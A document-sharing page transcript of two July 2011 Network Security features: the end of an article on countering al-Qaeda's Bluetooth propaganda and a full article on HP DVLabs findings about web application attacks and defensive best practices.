beyond zero: analysing threat trends

3
using conventional arguments, so the difficult question facing Western allies is how to subvert these Bluetooth narrow- casts. Unconfirmed reports suggest that Western soldiers have been deploying Bluetooth signal jammers that block the control channels in the 2400-2480MHz waveband. The reality, however, is that without mesh-like coverage in a given area, the effectiveness of this type of jamming is limited, especially given the fact that this approach blocks all types of Bluetooth broadcasts, and not just the FJA al-Qaeda transmissions. In theory, because of the packet- driven nature of the Bluetooth piconets, it should be possible to narrowcast a version of a given FJA magazine that has malformed packets or headers. This would mean that, although the Bluetooth transmission would checksum and ACK/NAK as normal, when recipi- ents try to view the magazine on their smartphones, the data would appear jumbled. In the longer term, given the firmware-updatable nature of modern smartphones, it should be possible to allocate MAC-like identification routines within Bluetooth packet headers – per- haps derived from the International Mobile Subscriber Identity (IMSI) of the smartphone’s SIM card and/or the International Mobile Equipment Identity (IMEI) of the smartphone itself. With most GSM and 3G networks now allowing only local SIM cards that have been identity-verified to use their networks, even if al-Qaeda uses stolen or reprogrammed smartphones to seed the community with their jihadist nar- rowcasts, anyone receiving an e-magazine could trace the narrowcast back along its chain of transmission. At the very least, this would allow the intelligence agencies to cross-match the re-transmitters of the al-Qaeda Bluetooth transmissions with a list of known terrorists and, perhaps more importantly, identify probable supporters. In fact, since most cellcos now maintain active lists of the registration details of their pre-pay SIM cards, it is possible to cross-match the SIM cards of the re- transmitting smartphones and the time of the re-transmission with the triangulated location of the mobile at the time of the Bluetooth narrowcast. Through careful extrapolation of the available data, it then becomes possible to work out the prob- able location of the Class 1 Bluetooth al- Qaeda originator of a given e-magazine, and take action accordingly. About the author Steve Gold has been a business journal- ist and technology writer for 26 years. A qualified accountant and former auditor, he has specialised in IT security, business matters, the Internet and communications for most of that time. He is technical editor of Infosecurity and lectures regularly on criminal psychology and cybercrime. Resources Bluetooth used for dating in Dubai. Youtube. Accessed Jul 2011. <http:www.youtube.com/watch?v=- HNS0SmzXXU>. ‘Member Suggests Using Bluetooth to Spread Terrorist Propaganda’. CBS News, 3 Jun 2008. Accessed Jul 2011. < http://www.cbsnews. com/8301-502684_162-4148770- 502684.html>. Stanley, Nigel. ‘BBC Story on Bloor Research into Jihadists use of Smartphones’. Bloor Research, 26 Apr 2011. Accessed Jul 2011. <http://www.bloorresearch.com/blog/ Security-Blog/2011/4/bbc-story-on- bloor-research-into-jihadists-use-of- smartphone.html>. Ackerman, Spencer. ‘New Terror Propaganda Tool: Bluetooth’. Danger Room, Wired.com, 25 Jan 2011. Accessed Jul 2011. <http://www.wired.com/danger- room/2011/01/bluetooths-beam- terror-propaganda-to-your-ear- drums/>. Prucha, Nico. ‘Entering a new dimension: Jihad via Bluetooth’. Jihadica, 24 Jan 2011. Accessed Jul 2011. <http://www.jihadica. com/entering-a-new-dimension- %E2%80%93-jihad-via-bluetooth- part-1>. ‘Smart terror – terror Bluetooth’. Software. Noeman.org, 25 Sept 2009. Accessed Jul 2011. <http://www. noeman.org/gsm/python-applications- s60v5-s60v3/91475-smart-terror- terror-bluetooth-beta-version- v-2-2-a.html>. FEATURE July 2011 Network Security 7 Beyond zero: analysing threat trends Will Gragido In tracing the history of threats over the past decade, we saw a sharp rise in ‘clas- sic’ threats between 2000 and 2005, which targeted systems that were widely distributed across networks – such as the Microsoft Windows operating system. More sophisticated threats emerged in 2005 and 2006, indicating another level of danger. And in 2008, with the advent of the Conficker worm, there appeared to be a resurgence of the ‘classic’ threat. In fact, Conficker was anything but ordinary or classic – it spread rapidly as variants were released into the mainstream. Will Gragido, HP TippingPoint DVLabs In today’s world of sophisticated and escalating cyber-attacks against vulnerable data, we have entered new and dangerous ground within the Internet threat landscape.

Upload: will-gragido

Post on 05-Jul-2016

216 views

Category:

Documents


0 download

TRANSCRIPT

using conventional arguments, so the difficult question facing Western allies is how to subvert these Bluetooth narrow-casts. Unconfirmed reports suggest that Western soldiers have been deploying Bluetooth signal jammers that block the control channels in the 2400-2480MHz waveband. The reality, however, is that without mesh-like coverage in a given area, the effectiveness of this type of jamming is limited, especially given the fact that this approach blocks all types of Bluetooth broadcasts, and not just the FJA al-Qaeda transmissions.

In theory, because of the packet-driven nature of the Bluetooth piconets, it should be possible to narrowcast a version of a given FJA magazine that has malformed packets or headers. This would mean that, although the Bluetooth transmission would checksum and ACK/NAK as normal, when recipi-ents try to view the magazine on their smartphones, the data would appear jumbled. In the longer term, given the firmware-updatable nature of modern smartphones, it should be possible to allocate MAC-like identification routines within Bluetooth packet headers – per-haps derived from the International Mobile Subscriber Identity (IMSI) of the smartphone’s SIM card and/or the International Mobile Equipment Identity (IMEI) of the smartphone itself.

With most GSM and 3G networks now allowing only local SIM cards that have been identity-verified to use their networks, even if al-Qaeda uses stolen

or reprogrammed smartphones to seed the community with their jihadist nar-rowcasts, anyone receiving an e-magazine could trace the narrowcast back along its chain of transmission. At the very least, this would allow the intelligence agencies to cross-match the re-transmitters of the al-Qaeda Bluetooth transmissions with a list of known terrorists and, perhaps more importantly, identify probable supporters. In fact, since most cellcos now maintain active lists of the registration details of their pre-pay SIM cards, it is possible to cross-match the SIM cards of the re-transmitting smartphones and the time of the re-transmission with the triangulated location of the mobile at the time of the Bluetooth narrowcast. Through careful extrapolation of the available data, it then becomes possible to work out the prob-able location of the Class 1 Bluetooth al-Qaeda originator of a given e-magazine, and take action accordingly.

About the author

Steve Gold has been a business journal-ist and technology writer for 26 years. A qualified accountant and former auditor, he has specialised in IT security, business matters, the Internet and communications for most of that time. He is technical editor of Infosecurity and lectures regularly on criminal psychology and cybercrime.

Resources

• Bluetooth used for dating in Dubai. Youtube. Accessed Jul 2011.

<http:www.youtube.com/watch?v=-HNS0SmzXXU>.

• ‘Member Suggests Using Bluetooth to Spread Terrorist Propaganda’. CBS News, 3 Jun 2008. Accessed Jul 2011. < http://www.cbsnews.com/8301-502684_162-4148770-502684.html>.

• Stanley, Nigel. ‘BBC Story on Bloor Research into Jihadists use of Smartphones’. Bloor Research, 26 Apr 2011. Accessed Jul 2011. <http://www.bloorresearch.com/blog/Security-Blog/2011/4/bbc-story-on-bloor-research-into-jihadists-use-of-smartphone.html>.

• Ackerman, Spencer. ‘New Terror Propaganda Tool: Bluetooth’. Danger Room, Wired.com, 25 Jan 2011. Accessed Jul 2011. <http://www.wired.com/danger-room/2011/01/bluetooths-beam-terror-propaganda-to-your-ear-drums/>.

• Prucha, Nico. ‘Entering a new dimension: Jihad via Bluetooth’. Jihadica, 24 Jan 2011. Accessed Jul 2011. <http://www.jihadica.com/entering-a-new-dimension-%E2%80%93-jihad-via-bluetooth-part-1>.

• ‘Smart terror – terror Bluetooth’. Software. Noeman.org, 25 Sept 2009. Accessed Jul 2011. <http://www.noeman.org/gsm/python-applications-s60v5-s60v3/91475-smart-terror-terror-bluetooth-beta-version- v-2-2-a.html>.

FEATURE

July 2011 Network Security7

Beyond zero: analysing threat trends

Will Gragido

In tracing the history of threats over the past decade, we saw a sharp rise in ‘clas-sic’ threats between 2000 and 2005, which targeted systems that were widely

distributed across networks – such as the Microsoft Windows operating system. More sophisticated threats emerged in 2005 and 2006, indicating another level

of danger. And in 2008, with the advent of the Conficker worm, there appeared to be a resurgence of the ‘classic’ threat. In fact, Conficker was anything but ordinary or classic – it spread rapidly as variants were released into the mainstream.

Will Gragido, HP TippingPoint DVLabs In today’s world of sophisticated and escalating cyber-attacks against vulnerable data, we have entered new and dangerous ground within the Internet threat landscape.

FEATURE

Following the introduction of the Conficker worm, a dramatic increase in web application vulnerabilities was seen, lasting well into 2010. Research released by HP TippingPoint’s Digital Vaccine Labs (DVLabs) in September 2010 indicated that attacks associated with web application vulnerabilities surpass all other categories in volume.1 These attacks are expected to escalate and remain at the forefront of threat activity. Conversely, more conventional attacks, such as those targeting standard operat-ing systems – will continue to decline.

Figure 1 is a graphical representation of vulnerability disclosure from 2000 through to 2010. It is important to note the impact of vulnerable web applications, particularly from 2006 through 2008, and the decline in vulnerability disclosure

from 2008 through 2010. Despite the overall decline in disclosed vulnerabilities, the research confirms that the majority of activity and vulnerabilities were related to web-based applications.

Last year was a significant year for cyber-threats as they demonstrated greater sophistication. The report indicates that the proliferation of technology (and its availability in previously untouched markets), along with simple, rapid acces-sibility, has an unprecedented negative impact on the state of security globally. The research, data collection and findings produced four key points:• The availability and consumption of

enterprise computing technologies is growing, leading to the emergence of more sophisticated, next-generation threats.

• Web applications remain at the fore-front of exploit activity.

• The sophistication and organisation of cyber-attacks is increasing.

• Legacy threats remain an unrelent-ing element of the modern Internet threat landscape and are experiencing a resurgence.

Next-generation threatsThe research also reflected the impact of enterprise-grade computing technolo-gies on the emergence of next-generation threats. Most significantly, threat capabili-ties were influenced directly by the availa-bility and consumption of these technolo-gies in modern enterprise environments.

Web 2.0 technologies such as Facebook, Twitter, Wordpress and iTunes are increasingly leveraged for business today. They help promote brand awareness and collaboration, and enable organisations to adapt to a changing global business mar-ketplace. However, these technologies also play a large role in enabling cyber-threats to successfully exploit individuals and enterprises. As a result, enterprise security teams and risk officers are challenged to efficiently mitigate these risks without dis-rupting business operations.

The DVLabs research shows that many organisations do not want to expose their companies to greater risk merely on the basis of a business value justification. The research also noted a general lack of security diligence in the management and enablement of Web 2.0 applications of a questionable state. This trend is dangerous to any organisation, especially given the range and types of threats to enterprise environments.

Web applications at the forefrontThroughout the DVLabs research efforts, web applications remained a strong focus and at the forefront of exploit activity. Specifically, the research noted a rise in professionally crafted exploit kits with a money-back guarantee designed to capi-talise on the weaknesses present in web applications and architectures.

Figure 2 provides insight into the number of client-side HTTP attacks

8Network Security July 2011

Figure 1: Overall vulnerability disclosure, 2000-2010.

Figure 2: HTTP client-side attacks by month during sample period.

Figure 3: HTTP server-side attacks by month during sampling period.

FEATURE

July 2011 Network Security9

during the first six months of 2010, most of which were malicious Javascript and file format attacks. Figure 3 provides simi-lar insight into the number of server-side HTTP attacks, primarily cross-site script-ing, SQL injection and PHP RFI.

“Recent research suggests it is more common now for attackers to remain resident within a compromised enterprise environment for extended periods of time, harvesting information to develop new mechanisms for attack”

Research shows that attacks launched against web servers versus those against clients represent a 50:1 ratio. This sug-gests that the rate, frequency and non-structured approach of attacks against web servers are all escalating. Although many attacks fail, the force multiplier approach demonstrates their persistence in establishing a qualified compromise.

Research indicated that attackers were more concerned with creating a data exfiltration point or malicious code than seeking ‘shell’ or ‘root’. Low-volume sites were also targeted by attackers to introduce malicious code in a variety of forms. As a result, attackers had greater control over sites to which they could direct unsuspecting victims with the intent of further exploitation.

Increasing sophistication and organisationOne of the more alarming trends in the past six months is the growing sophistica-tion of attacks as they evolve to be more organised, subversive and inconspicu-ous. This trend is by design rather than chance. Many attacks are so subtle that few victims recognise the intrusion until it is too late. Recent research suggests it is more common now for attackers to remain resident within a compromised enterprise environment for extended periods of time, harvesting information to develop new mechanisms for attack. Once the information needed is in hand, the attackers have the ability to develop and launch covert exploits that will have a more significant impact.

While preparing the report, research-ers invested time in the identification, tracking and analysis of trends within the threat landscape. Equal time was spent on an advanced technical analysis of Adobe’s Portable Document Format (PDF). As previously noted, malicious file formats play a major role in many modern, client-based attacks. HP research indicated that Adobe’s overall patch speed versus other third-party applications is consist-ent, yet slow. The report also determined that Adobe Reader v9 performs better than older versions such as v7 and v8. In reviewing the data sets relevant to v9 separately from v7 and v8, the vulner-ability patch life cycle was found to be equivalent to that of Microsoft’s patch cycle – approximately 15 days.

Protection against current and emerging threats

The DVLabs research shines a light on new areas of concern and emerging threat trends. DVLabs' team, in connec-tion with the SANS Institute, has devel-oped a best practice guide to aid enter-prise organisations in mitigating current and emerging threats: 1. Know your software/application

inventory. This provides a deeper per-spective of what is currently active in your enterprise footprint and enables you to better plan for remediation of unauthorised applications.

2. Ensure your organisation is support-ed by a defined and mature config-uration-management process. If not, you may be opening your company to unnecessary risk.

3. Understand the security requirements associated with moving to a cloud computing model. As DVLabs research suggests that moving to the cloud can introduce certain vulnerabilities, a thor-ough risk assessment should be per-formed to ensure safe cloud utilisation.

4. Make sure your web application developers remain current. This will enable you to reduce or eliminate the net effect of many threats. Don’t assume that the behaviour or antici-pated behaviour of an application

will align with a given language or design scheme. Encouraging adher-ence to a sound Software Delivery Life Cycle (SDLC) and other application security software stand-ards of good practice, such as the RUGGED software security model, will yield positive results.

5. Educate your end users. Instances of Cross-Site Request Forgery (CSRF) are high and will continue to grow. A clear understanding of the proper way to log off privileged (authentication-driven) websites prior to engaging other websites, can pay significant dividends. Enterprises that take the time to invest in security-awareness programmes reap long-term benefits.

6. Invest in efficient patch management. Systems kept up to date with the lat-est security patches are more likely to be resistant to attacks.

7. Remain vigilant in the ongoing mainte-nance, monitoring and analysis of your enterprise environment. This includes the systems, people and processes need-ed to safeguard your organisation.

About the author

Will Gragido is the product line manager for HP DVLabs with oversight over various DV-related services and other DVLabs projects. He has expertise in operations, vulnerability and threat analysis, management, professional services and consultancy, pre-sales/architecture and business development within the informa-tion security industry. Prior to joining HP, he held various positions at McAfee, Internet Security Systems, International Network Services and the United States Marine Corps. Gragido is a long-standing member of (ISC)2, ISACA, and ISSA. He holds CISSP and CISA certifications, as well as accreditations in the National Security Agency’s Information Security Assessment Methodology (IAM) and Information Security Evaluation Methodology (IEM).

References

1. ‘2010 Top Cyber Security Risks Report’. HP TippingPoint DVLabs, September 2010. Accessed May 2011. <http://dvlabs.tippingpoint.com/toprisks2010>.